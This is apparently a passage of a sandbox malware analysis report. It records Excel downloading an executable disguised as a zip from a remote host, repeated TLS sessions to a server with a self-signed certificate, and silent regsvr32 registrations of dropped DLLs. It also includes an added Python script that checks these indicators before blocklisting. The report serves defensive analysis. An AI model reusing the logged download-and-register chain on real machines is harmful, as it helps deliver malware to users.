Jan 21, 2021 16:04:31.227071047 CET | 8.8.8.8 | 192.168.2.22 | 0x2cc0 | No error (0) | creditoenusa.com | - | 192.185.224.50 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• stellarum.com.br

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49168 | 191.252.144.65 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 21, 2021 16:03:27.767260075 CET | 748 | OUT | GET /hknmwj.zip HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: stellarum.com.br
    Connection: Keep-Alive
Jan 21, 2021 16:03:28.032418013 CET | 750 | IN | HTTP/1.1 200 OK
    Date: Thu, 21 Jan 2021 15:03:27 GMT
    Server: Apache
    Last-Modified: Sat, 19 May 2018 08:09:45 GMT
    Accept-Ranges: bytes
    Content-Length: 856064
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/zip
    Data Ascii: MZ ... This program cannot be run in DOS mode. ... Rich ... PE ... .text ... .rdata ... .data ... .rsrc ... .reloc ... (non-printable bytes of the response body omitted)


HTTPS Packets

Only two distinct JA3 SSL client fingerprints occur in this table (they differ only in whether TLS extension 0, server_name, is present); rows refer to them as JA3 A and JA3 B:
JA3 A: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 (JA3 SSL Client Digest 7dcce5b76c8b17472d024758970a406b)
JA3 B: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 (JA3 SSL Client Digest eb88d0b3e1961a0562f006e5ce2a0b87)

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint / Digest
Jan 21, 2021 16:03:17.059777975 CET | 64.37.52.172 | 443 | 192.168.2.22 | 49165 | CN=qsf.surfescape.net | CN=R3, O=Let's Encrypt, C=US | Tue Dec 15 06:38:20 CET 2020 | Mon Mar 15 06:38:20 CET 2021 | JA3 A
    chain: CN=R3, O=Let's Encrypt, C=US | issued by CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Jan 21, 2021 16:03:38.775681973 CET | 103.83.81.27 | 443 | 192.168.2.22 | 49169 | CN=reliablelifts.co.in | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | Fri Jan 01 01:00:00 CET 2021 | Fri Apr 02 01:59:59 CEST 2021 | JA3 A
    chain: CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | issued by CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025
    chain: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | issued by CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029
Jan 21, 2021 16:04:10.528618097 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49170 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:17.732096910 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49174 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:20.449372053 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49176 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:24.326739073 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49181 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:27.251132965 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49185 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:28.954595089 CET | 198.136.54.91 | 443 | 192.168.2.22 | 49184 | CN=cpanel.shopandmartonline.com | CN=R3, O=Let's Encrypt, C=US | Tue Jan 05 04:39:55 CET 2021 | Mon Apr 05 05:39:55 CEST 2021 | JA3 A
    chain: CN=R3, O=Let's Encrypt, C=US | issued by CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Jan 21, 2021 16:04:30.556129932 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49190 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:31.613471985 CET | 192.185.224.50 | 443 | 192.168.2.22 | 49191 | CN=avilesnieves.comoganardineroconduciendo.com | CN=R3, O=Let's Encrypt, C=US | Mon Jan 11 22:18:52 CET 2021 | Sun Apr 11 23:18:52 CEST 2021 | JA3 A
    chain: CN=R3, O=Let's Encrypt, C=US | issued by CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Jan 21, 2021 16:04:33.298172951 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49194 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:39.180341005 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49198 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:43.371397972 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49202 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:46.921905994 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49206 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:51.614739895 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49211 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:53.908262968 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49214 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:04:59.962903023 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49220 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:01.242079973 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49222 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:06.848613024 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49228 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:07.794094086 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49229 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:13.080928087 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49235 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:13.163276911 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49237 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:14.613040924 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49239 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:19.109059095 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49247 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:20.323662996 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49250 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:20.694333076 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49251 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:25.123593092 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49259 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:26.469088078 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49263 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:27.255584002 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49264 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:27.515480042 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49265 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
Jan 21, 2021 16:05:29.555104017 CET | 194.225.58.214 | 443 | 192.168.2.22 | 49270 | CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU | same as Subject (self-signed) | Sun Jan 10 12:16:33 CET 2021 | Sun Jul 11 13:16:33 CEST 2021 | JA3 B
                                                                                                Jan 21, 2021 16:05:31.183587074 CET194.225.58.214443192.168.2.2249275CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:33.273708105 CET194.225.58.214443192.168.2.2249281CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:33.720570087 CET194.225.58.214443192.168.2.2249282CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:35.610054970 CET194.225.58.214443192.168.2.2249288CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:37.258397102 CET194.225.58.214443192.168.2.2249294CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:38.472693920 CET194.225.58.214443192.168.2.2249298CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:39.452081919 CET194.225.58.214443192.168.2.2249300CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:39.785105944 CET194.225.58.214443192.168.2.2249302CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:41.637602091 CET194.225.58.214443192.168.2.2249307CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:43.339689970 CET194.225.58.214443192.168.2.2249314CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:44.681730986 CET194.225.58.214443192.168.2.2249318CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:45.476336956 CET194.225.58.214443192.168.2.2249319CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                Jan 21, 2021 16:05:45.738255978 CET194.225.58.214443192.168.2.2249320CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
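
The rows above are worth a few quick checks before their values go into a blocklist: whether the certificate is self-signed (issuer identical to subject), how long it is valid, whether the JA3 digest really is the MD5 of the printed fingerprint string, and how tightly the 21 sessions are spaced. The script below is an added example written for this page, not Joe Sandbox code. It embeds the values from the rows above as constructed input and assumes fixed +1 and +2 hour offsets for the CET and CEST abbreviations the report prints; the function names are the author's own.

```python
"""Added example (not Joe Sandbox code): sanity checks over the TLS rows above."""
import hashlib
import re
from datetime import datetime, timedelta, timezone

# Values copied from the report rows above; every row carries the same ones.
SUBJECT = "CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU"
ISSUER = "CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RU"
NOT_BEFORE = "Sun Jan 10 12:16:33 CET 2021"
NOT_AFTER = "Sun Jul 11 13:16:33 CEST 2021"
JA3 = ("771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-"
       "49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0")
JA3_DIGEST = "eb88d0b3e1961a0562f006e5ce2a0b87"

# (timestamp, client source port) per row; server is 194.225.58.214:443, client 192.168.2.22.
CONNECTIONS = [
    ("Jan 21, 2021 16:05:19.109059095 CET", 49247), ("Jan 21, 2021 16:05:20.323662996 CET", 49250),
    ("Jan 21, 2021 16:05:20.694333076 CET", 49251), ("Jan 21, 2021 16:05:25.123593092 CET", 49259),
    ("Jan 21, 2021 16:05:26.469088078 CET", 49263), ("Jan 21, 2021 16:05:27.255584002 CET", 49264),
    ("Jan 21, 2021 16:05:27.515480042 CET", 49265), ("Jan 21, 2021 16:05:29.555104017 CET", 49270),
    ("Jan 21, 2021 16:05:31.183587074 CET", 49275), ("Jan 21, 2021 16:05:33.273708105 CET", 49281),
    ("Jan 21, 2021 16:05:33.720570087 CET", 49282), ("Jan 21, 2021 16:05:35.610054970 CET", 49288),
    ("Jan 21, 2021 16:05:37.258397102 CET", 49294), ("Jan 21, 2021 16:05:38.472693920 CET", 49298),
    ("Jan 21, 2021 16:05:39.452081919 CET", 49300), ("Jan 21, 2021 16:05:39.785105944 CET", 49302),
    ("Jan 21, 2021 16:05:41.637602091 CET", 49307), ("Jan 21, 2021 16:05:43.339689970 CET", 49314),
    ("Jan 21, 2021 16:05:44.681730986 CET", 49318), ("Jan 21, 2021 16:05:45.476336956 CET", 49319),
    ("Jan 21, 2021 16:05:45.738255978 CET", 49320),
]

# Assumption: the report prints CET/CEST; strptime's %Z only knows the local zone, so map offsets by hand.
TZ_HOURS = {"CET": 1, "CEST": 2}


def parse_cert_time(text):
    """'Sun Jan 10 12:16:33 CET 2021' -> timezone-aware datetime normalised to UTC."""
    _dow, mon, day, clock, tz, year = text.split()
    naive = datetime.strptime(f"{mon} {day} {year} {clock}", "%b %d %Y %H:%M:%S")
    return naive.replace(tzinfo=timezone(timedelta(hours=TZ_HOURS[tz]))).astimezone(timezone.utc)


def parse_report_time(text):
    """'Jan 21, 2021 16:05:19.109059095 CET' -> aware datetime; nanosecond fraction truncated to microseconds."""
    base, frac, tz = re.fullmatch(r"(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) (\w+)", text).groups()
    naive = datetime.strptime(base, "%b %d, %Y %H:%M:%S")
    return naive.replace(microsecond=int(frac[:6].ljust(6, "0")),
                         tzinfo=timezone(timedelta(hours=TZ_HOURS[tz])))


def parse_dn(dn):
    """'CN=a, O=b' -> {'CN': 'a', 'O': 'b'} (the names on this page contain no escaped commas)."""
    return dict(part.strip().split("=", 1) for part in dn.split(","))


def is_self_signed(subject, issuer):
    """Issuer equal to subject means no CA vouched for the certificate."""
    return parse_dn(subject) == parse_dn(issuer)


def cert_lifetime_days(not_before, not_after):
    return (parse_cert_time(not_after) - parse_cert_time(not_before)).days


def ja3_version(ja3):
    """First JA3 field is the ClientHello version in decimal; 771 == 0x0303 == TLS 1.2."""
    return int(ja3.split(",", 1)[0])


def ja3_digest(ja3):
    """The JA3 digest is defined as the MD5 of the fingerprint string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def connection_stats(connections):
    """Session count, overall span and the longest pause: a cheap beacon-cadence check."""
    times = [parse_report_time(ts) for ts, _ in connections]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return {
        "count": len(connections),
        "span_seconds": round((times[-1] - times[0]).total_seconds(), 3),
        "max_gap_seconds": round(max(gaps), 3),
        "distinct_client_ports": len({port for _, port in connections}),
    }


if __name__ == "__main__":
    print("self-signed:", is_self_signed(SUBJECT, ISSUER))
    print("certificate lifetime (days):", cert_lifetime_days(NOT_BEFORE, NOT_AFTER))
    print("ClientHello version field:", ja3_version(JA3))
    print("digest recomputed from fingerprint matches report:", ja3_digest(JA3) == JA3_DIGEST)
    print(connection_stats(CONNECTIONS))
```

Because JA3 hashes the ClientHello, the digest identifies the TLS client on the analysis host rather than the server, so treat the IP and the self-signed subject as the indicators and the JA3 value as context about the sandbox's TLS stack; the 21 sessions in roughly 27 seconds with no gap above five seconds is a burst, not a timed beacon, which is consistent with several regsvr32 instances each talking to the same host.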

                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

System Behavior

Each "General" block below is one process observed by the sandbox. The chain is EXCEL.EXE (Office14, i.e. Office 2010, 64-bit, started as an out-of-process automation server with /automation -Embedding) followed by repeated C:\Windows\System32\regsvr32.exe -s <DLL> invocations on DLLs dropped under C:\Users\user\AppData\Local\Temp (kxwni.dll, uveoybvk.dll, nnmumzom.dll, jxacpz.dll, sxzjqf.dll). The -s switch calls the DLL's DllRegisterServer export without showing any dialog. When the 64-bit regsvr32 is handed a 32-bit DLL it re-executes the 32-bit copy from C:\Windows\SysWOW64, which is why a System32 entry is followed by a SysWOW64 entry whose logged command line is the bare " -s <DLL>"; that relaunch is consistent with 32-bit payload DLLs. Every entry reports elevated and administrator privileges, so the registration ran at admin level on this analysis host.

                                                                                                General

                                                                                                Start time:16:02:43
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                Imagebase:0x13fa20000
                                                                                                File size:27641504 bytes
                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:16:02:49
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
                                                                                                Imagebase:0xffe50000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:16:02:55
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:16:02:55
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
